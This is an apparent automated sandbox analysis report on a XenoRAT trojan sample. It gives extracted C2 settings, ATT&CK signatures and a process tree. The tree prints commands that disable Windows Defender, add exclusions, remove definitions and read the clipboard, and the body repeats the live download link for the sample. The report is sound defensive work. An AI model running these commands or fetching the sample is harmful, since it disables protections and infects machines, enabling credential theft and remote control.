xenorat | hxxps://mega[.]nz/file/LYdmSRaZ#l-kgi8-D4G9-coBXoeP7kl0PkteVSCyEV6YHg2o39jw

Analysis

max time kernel
25s
max time network
34s
platform
windows10-2004_x64
resource
win10v2004-20240910-en
resource tags

arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
submitted
01-10-2024 10:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://mega.nz/file/LYdmSRaZ#l-kgi8-D4G9-coBXoeP7kl0PkteVSCyEV6YHg2o39jw

Score

10^/10

xenorat collection credential_access defense_evasion discovery execution persistence privilege_escalation rat spyware stealer trojan upx

Malware Config

Extracted

Family

xenorat

192.168.1.36

Mutex

Xeno_rat_nd8912d

Attributes

delay
5000
install_path
nothingset
port
4444
startup_name
nothingset

Signatures

Detect XenoRat Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0007000000023cc9-678.dat	family_xenorat
behavioral1/memory/2944-697-0x0000000000280000-0x0000000000292000-memory.dmp	family_xenorat

XenorRat
XenorRat is a remote access trojan written in C#.
trojan rat xenorat

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4604	powershell.exe
2568	powershell.exe
5844	powershell.exe
4756	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5948	cmd.exe
5608	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
5372	baguettetools.exe
716	baguettetools.exe
2944	bound.exe

Loads dropped DLL 17 IoCs

pid	Process
716	baguettetools.exe
716	baguettetools.exe
716	baguettetools.exe
716	baguettetools.exe
716	baguettetools.exe
716	baguettetools.exe
716	baguettetools.exe
716	baguettetools.exe
716	baguettetools.exe
716	baguettetools.exe
716	baguettetools.exe
716	baguettetools.exe
716	baguettetools.exe
716	baguettetools.exe
716	baguettetools.exe
716	baguettetools.exe
716	baguettetools.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
3136	tasklist.exe
5972	tasklist.exe
1104	tasklist.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023cc3-609.dat	upx
behavioral1/memory/716-613-0x00007FFB38240000-0x00007FFB38905000-memory.dmp	upx
behavioral1/files/0x0007000000023cb5-615.dat	upx
behavioral1/files/0x0007000000023cc1-617.dat	upx
behavioral1/memory/716-637-0x00007FFB4C850000-0x00007FFB4C85F000-memory.dmp	upx
behavioral1/files/0x0007000000023cbc-636.dat	upx
behavioral1/files/0x0007000000023cbb-635.dat	upx
behavioral1/files/0x0007000000023cba-634.dat	upx
behavioral1/files/0x0007000000023cb9-633.dat	upx
behavioral1/files/0x0007000000023cb8-632.dat	upx
behavioral1/files/0x0007000000023cb7-631.dat	upx
behavioral1/files/0x0007000000023cb6-630.dat	upx
behavioral1/files/0x0007000000023cb4-629.dat	upx
behavioral1/files/0x0007000000023cc8-628.dat	upx
behavioral1/files/0x0007000000023cc7-627.dat	upx
behavioral1/files/0x0007000000023cc6-626.dat	upx
behavioral1/files/0x0007000000023cc2-623.dat	upx
behavioral1/files/0x0007000000023cc0-622.dat	upx
behavioral1/memory/716-618-0x00007FFB44E00000-0x00007FFB44E25000-memory.dmp	upx
behavioral1/memory/716-643-0x00007FFB44DD0000-0x00007FFB44DFD000-memory.dmp	upx
behavioral1/memory/716-645-0x00007FFB45710000-0x00007FFB4572A000-memory.dmp	upx
behavioral1/memory/716-647-0x00007FFB44DA0000-0x00007FFB44DC4000-memory.dmp	upx
behavioral1/memory/716-649-0x00007FFB392D0000-0x00007FFB3944F000-memory.dmp	upx
behavioral1/memory/716-651-0x00007FFB45540000-0x00007FFB45559000-memory.dmp	upx
behavioral1/memory/716-653-0x00007FFB45CC0000-0x00007FFB45CCD000-memory.dmp	upx
behavioral1/memory/716-655-0x00007FFB3C220000-0x00007FFB3C253000-memory.dmp	upx
behavioral1/memory/716-660-0x00007FFB39200000-0x00007FFB392CE000-memory.dmp	upx
behavioral1/memory/716-659-0x00007FFB38240000-0x00007FFB38905000-memory.dmp	upx
behavioral1/memory/716-663-0x00007FFB44E00000-0x00007FFB44E25000-memory.dmp	upx
behavioral1/memory/716-662-0x00007FFB37D00000-0x00007FFB38233000-memory.dmp	upx
behavioral1/memory/716-665-0x00007FFB450B0000-0x00007FFB450C4000-memory.dmp	upx
behavioral1/memory/716-668-0x00007FFB45A40000-0x00007FFB45A4D000-memory.dmp	upx
behavioral1/memory/716-667-0x00007FFB44DD0000-0x00007FFB44DFD000-memory.dmp	upx
behavioral1/memory/716-672-0x00007FFB390E0000-0x00007FFB391FA000-memory.dmp	upx
behavioral1/memory/716-671-0x00007FFB45710000-0x00007FFB4572A000-memory.dmp	upx
behavioral1/memory/716-716-0x00007FFB44DA0000-0x00007FFB44DC4000-memory.dmp	upx
behavioral1/memory/716-766-0x00007FFB392D0000-0x00007FFB3944F000-memory.dmp	upx
behavioral1/memory/3956-852-0x00007FFB37270000-0x00007FFB37935000-memory.dmp	upx
behavioral1/memory/716-851-0x00007FFB3C220000-0x00007FFB3C253000-memory.dmp	upx
behavioral1/memory/3956-857-0x00007FFB459B0000-0x00007FFB459BF000-memory.dmp	upx
behavioral1/memory/716-856-0x00007FFB37D00000-0x00007FFB38233000-memory.dmp	upx
behavioral1/memory/3956-855-0x00007FFB38BF0000-0x00007FFB38C15000-memory.dmp	upx
behavioral1/memory/716-853-0x00007FFB39200000-0x00007FFB392CE000-memory.dmp	upx
behavioral1/memory/3956-862-0x00007FFB38980000-0x00007FFB389AD000-memory.dmp	upx
behavioral1/memory/3956-863-0x00007FFB38960000-0x00007FFB3897A000-memory.dmp	upx
behavioral1/memory/3956-865-0x00007FFB37240000-0x00007FFB37264000-memory.dmp	upx
behavioral1/memory/716-864-0x00007FFB390E0000-0x00007FFB391FA000-memory.dmp	upx
behavioral1/memory/3956-866-0x00007FFB370C0000-0x00007FFB3723F000-memory.dmp	upx
behavioral1/memory/3956-869-0x00007FFB458A0000-0x00007FFB458AD000-memory.dmp	upx
behavioral1/memory/3956-868-0x00007FFB370A0000-0x00007FFB370B9000-memory.dmp	upx
behavioral1/memory/3956-870-0x00007FFB37270000-0x00007FFB37935000-memory.dmp	upx
behavioral1/memory/3956-871-0x00007FFB37060000-0x00007FFB37093000-memory.dmp	upx
behavioral1/memory/3956-874-0x00007FFB364A0000-0x00007FFB3656E000-memory.dmp	upx
behavioral1/memory/3956-875-0x00007FFB38BF0000-0x00007FFB38C15000-memory.dmp	upx
behavioral1/memory/3956-877-0x00007FFB44640000-0x00007FFB4464D000-memory.dmp	upx
behavioral1/memory/3956-876-0x00007FFB37040000-0x00007FFB37054000-memory.dmp	upx
behavioral1/memory/3956-872-0x00007FFB34D60000-0x00007FFB35293000-memory.dmp	upx
behavioral1/memory/3956-902-0x00007FFB34D60000-0x00007FFB35293000-memory.dmp	upx
behavioral1/memory/3956-901-0x00007FFB37060000-0x00007FFB37093000-memory.dmp	upx
behavioral1/memory/3956-900-0x00007FFB364A0000-0x00007FFB3656E000-memory.dmp	upx
behavioral1/memory/3956-899-0x00007FFB370A0000-0x00007FFB370B9000-memory.dmp	upx
behavioral1/memory/3956-898-0x00007FFB370C0000-0x00007FFB3723F000-memory.dmp	upx
behavioral1/memory/3956-897-0x00007FFB37240000-0x00007FFB37264000-memory.dmp	upx
behavioral1/memory/3956-896-0x00007FFB38960000-0x00007FFB3897A000-memory.dmp	upx

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File created	C:\Users\Admin\Downloads\baguettetools.exe:Zone.Identifier	firefox.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bound.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5996	cmd.exe
5008	netsh.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3680	systeminfo.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Local Settings	firefox.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\baguettetools.exe:Zone.Identifier	firefox.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
5844	powershell.exe
5844	powershell.exe
4604	powershell.exe
4604	powershell.exe
2568	powershell.exe
2568	powershell.exe
5608	powershell.exe
5608	powershell.exe
3648	powershell.exe
3648	powershell.exe
5608	powershell.exe
3648	powershell.exe
5844	powershell.exe
5844	powershell.exe
4604	powershell.exe
4604	powershell.exe
2568	powershell.exe
2568	powershell.exe

Suspicious use of AdjustPrivilegeToken 54 IoCs

description	pid	Process
Token: SeDebugPrivilege	4904	firefox.exe
Token: SeDebugPrivilege	4904	firefox.exe
Token: 33	5196	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5196	AUDIODG.EXE
Token: SeDebugPrivilege	3136	tasklist.exe
Token: SeDebugPrivilege	5844	powershell.exe
Token: SeDebugPrivilege	4604	powershell.exe
Token: SeDebugPrivilege	5972	tasklist.exe
Token: SeDebugPrivilege	2568	powershell.exe
Token: SeIncreaseQuotaPrivilege	4420	WMIC.exe
Token: SeSecurityPrivilege	4420	WMIC.exe
Token: SeTakeOwnershipPrivilege	4420	WMIC.exe
Token: SeLoadDriverPrivilege	4420	WMIC.exe
Token: SeSystemProfilePrivilege	4420	WMIC.exe
Token: SeSystemtimePrivilege	4420	WMIC.exe
Token: SeProfSingleProcessPrivilege	4420	WMIC.exe
Token: SeIncBasePriorityPrivilege	4420	WMIC.exe
Token: SeCreatePagefilePrivilege	4420	WMIC.exe
Token: SeBackupPrivilege	4420	WMIC.exe
Token: SeRestorePrivilege	4420	WMIC.exe
Token: SeShutdownPrivilege	4420	WMIC.exe
Token: SeDebugPrivilege	4420	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4420	WMIC.exe
Token: SeRemoteShutdownPrivilege	4420	WMIC.exe
Token: SeUndockPrivilege	4420	WMIC.exe
Token: SeManageVolumePrivilege	4420	WMIC.exe
Token: 33	4420	WMIC.exe
Token: 34	4420	WMIC.exe
Token: 35	4420	WMIC.exe
Token: 36	4420	WMIC.exe
Token: SeDebugPrivilege	5608	powershell.exe
Token: SeDebugPrivilege	3648	powershell.exe
Token: SeDebugPrivilege	1104	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4420	WMIC.exe
Token: SeSecurityPrivilege	4420	WMIC.exe
Token: SeTakeOwnershipPrivilege	4420	WMIC.exe
Token: SeLoadDriverPrivilege	4420	WMIC.exe
Token: SeSystemProfilePrivilege	4420	WMIC.exe
Token: SeSystemtimePrivilege	4420	WMIC.exe
Token: SeProfSingleProcessPrivilege	4420	WMIC.exe
Token: SeIncBasePriorityPrivilege	4420	WMIC.exe
Token: SeCreatePagefilePrivilege	4420	WMIC.exe
Token: SeBackupPrivilege	4420	WMIC.exe
Token: SeRestorePrivilege	4420	WMIC.exe
Token: SeShutdownPrivilege	4420	WMIC.exe
Token: SeDebugPrivilege	4420	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4420	WMIC.exe
Token: SeRemoteShutdownPrivilege	4420	WMIC.exe
Token: SeUndockPrivilege	4420	WMIC.exe
Token: SeManageVolumePrivilege	4420	WMIC.exe
Token: 33	4420	WMIC.exe
Token: 34	4420	WMIC.exe
Token: 35	4420	WMIC.exe
Token: 36	4420	WMIC.exe

Suspicious use of FindShellTrayWindow 22 IoCs

pid	Process
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe
4904	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4156 wrote to memory of 4904	4156	firefox.exe	85
PID 4156 wrote to memory of 4904	4156	firefox.exe	85
PID 4156 wrote to memory of 4904	4156	firefox.exe	85
PID 4156 wrote to memory of 4904	4156	firefox.exe	85
PID 4156 wrote to memory of 4904	4156	firefox.exe	85
PID 4156 wrote to memory of 4904	4156	firefox.exe	85
PID 4156 wrote to memory of 4904	4156	firefox.exe	85
PID 4156 wrote to memory of 4904	4156	firefox.exe	85
PID 4156 wrote to memory of 4904	4156	firefox.exe	85
PID 4156 wrote to memory of 4904	4156	firefox.exe	85
PID 4156 wrote to memory of 4904	4156	firefox.exe	85
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 1688	4904	firefox.exe	86
PID 4904 wrote to memory of 4784	4904	firefox.exe	87
PID 4904 wrote to memory of 4784	4904	firefox.exe	87
PID 4904 wrote to memory of 4784	4904	firefox.exe	87
PID 4904 wrote to memory of 4784	4904	firefox.exe	87
PID 4904 wrote to memory of 4784	4904	firefox.exe	87
PID 4904 wrote to memory of 4784	4904	firefox.exe	87
PID 4904 wrote to memory of 4784	4904	firefox.exe	87
PID 4904 wrote to memory of 4784	4904	firefox.exe	87

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://mega.nz/file/LYdmSRaZ#l-kgi8-D4G9-coBXoeP7kl0PkteVSCyEV6YHg2o39jw"
1⤵
- Suspicious use of WriteProcessMemory
PID:4156
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://mega.nz/file/LYdmSRaZ#l-kgi8-D4G9-coBXoeP7kl0PkteVSCyEV6YHg2o39jw
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4904
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1944 -prefMapHandle 1936 -prefsLen 23602 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2f931f2-1248-41fd-97d1-4ebebce6c4fe} 4904 "\\.\pipe\gecko-crash-server-pipe.4904" gpu
    3⤵
    PID:1688
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2460 -parentBuildID 20240401114208 -prefsHandle 2452 -prefMapHandle 2448 -prefsLen 24522 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {540f7477-5d2c-4f25-b1c9-efd6f75c52af} 4904 "\\.\pipe\gecko-crash-server-pipe.4904" socket
    3⤵
    - Checks processor information in registry
    PID:4784
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3056 -childID 1 -isForBrowser -prefsHandle 3048 -prefMapHandle 1568 -prefsLen 22590 -prefMapSize 244628 -jsInitHandle 1164 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4a2d629e-5c62-4321-84b3-5f9037578cd3} 4904 "\\.\pipe\gecko-crash-server-pipe.4904" tab
    3⤵
    PID:4368
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3640 -childID 2 -isForBrowser -prefsHandle 3660 -prefMapHandle 3656 -prefsLen 29012 -prefMapSize 244628 -jsInitHandle 1164 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b5d8422-46d7-49cc-8dfe-aa52c3b6b4c1} 4904 "\\.\pipe\gecko-crash-server-pipe.4904" tab
    3⤵
    PID:2488
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4396 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4600 -prefMapHandle 4596 -prefsLen 29012 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b9203f0d-9c40-426b-831f-395ec6f4e153} 4904 "\\.\pipe\gecko-crash-server-pipe.4904" utility
    3⤵
    - Checks processor information in registry
    PID:628
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5496 -childID 3 -isForBrowser -prefsHandle 3424 -prefMapHandle 5472 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1164 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {67a73967-6caf-466c-8c02-7f650df4244c} 4904 "\\.\pipe\gecko-crash-server-pipe.4904" tab
    3⤵
    PID:4604
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5728 -childID 4 -isForBrowser -prefsHandle 5648 -prefMapHandle 5652 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1164 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee9f791e-17fc-439a-ab31-d4c501f93307} 4904 "\\.\pipe\gecko-crash-server-pipe.4904" tab
    3⤵
    PID:3408
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5920 -childID 5 -isForBrowser -prefsHandle 5840 -prefMapHandle 5844 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1164 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {267420de-3d7f-419c-a9fa-23189755808c} 4904 "\\.\pipe\gecko-crash-server-pipe.4904" tab
    3⤵
    PID:4940
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6032 -childID 6 -isForBrowser -prefsHandle 6152 -prefMapHandle 6168 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1164 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9046b44f-579b-4441-a462-b7f86eee5b00} 4904 "\\.\pipe\gecko-crash-server-pipe.4904" tab
    3⤵
    PID:4344

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f8 0x4e8
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5196

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1472

C:\Users\Admin\Desktop\baguettetools.exe
"C:\Users\Admin\Desktop\baguettetools.exe"
1⤵
- Executes dropped EXE
PID:5372
- C:\Users\Admin\Desktop\baguettetools.exe
  "C:\Users\Admin\Desktop\baguettetools.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\baguettetools.exe'"
    3⤵
    PID:4760
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\baguettetools.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:5708
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    PID:5724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    PID:5732
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1992
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5432
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:5948
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:4724
  - - C:\Windows\System32\Wbem\WMIC.exe
